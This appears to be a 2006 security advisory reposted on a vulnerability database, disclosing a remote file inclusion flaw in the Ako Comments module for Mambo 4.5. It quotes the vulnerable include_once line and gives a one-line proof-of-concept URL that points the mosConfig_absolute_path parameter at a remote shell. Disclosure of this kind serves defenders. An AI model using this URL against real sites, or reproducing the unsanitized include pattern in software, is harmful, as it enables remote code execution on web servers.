Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:13961
HistoryAug 21, 2006 - 12:00 a.m.

Ako Comments (mod) Remote File Inclusion

2006-08-2100:00:00
vulners.com
232
            ###########################################################################################
            #                       Aria-Security.net Advisory                                        #
            #                       Discovered  by: O.U.T.L.A.W                                       #     

            #                       < www.Aria-security.net >                                         #
            #               Gr33t to: A.U.R.A & Hessam-X & Cl0wn & DrtRp                              #
            #                                                                                         #
            ###########################################################################################

#Software: Ako Comments (mod)
#Attack method: Remote File Inclusion
#Source:

#Description: This module shows users' comments from component AkoComments.
#File Version: 1.1 for Mambo 4.5

include_once($mosConfig_absolute_path.'/components/com_akocomment/languages/'.$mosConfig_lang.'.php');


#Proof of Concept:
#http://www.site.com/akocomments.php?mosConfig_absolute_path=shell

#----------------------------------------------------------

#Contact : [email protected]